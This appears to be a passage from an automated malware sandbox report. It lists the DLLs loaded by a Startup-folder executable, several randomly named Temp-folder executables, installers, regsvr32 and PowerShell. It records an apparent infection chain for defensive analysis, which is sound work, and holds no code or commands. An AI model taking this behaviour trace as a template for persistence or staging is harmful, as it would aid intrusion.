                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasapi32.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasman.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rtutils.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: taskschd.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: sxs.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: dwmapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Section loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: urlmon.dll
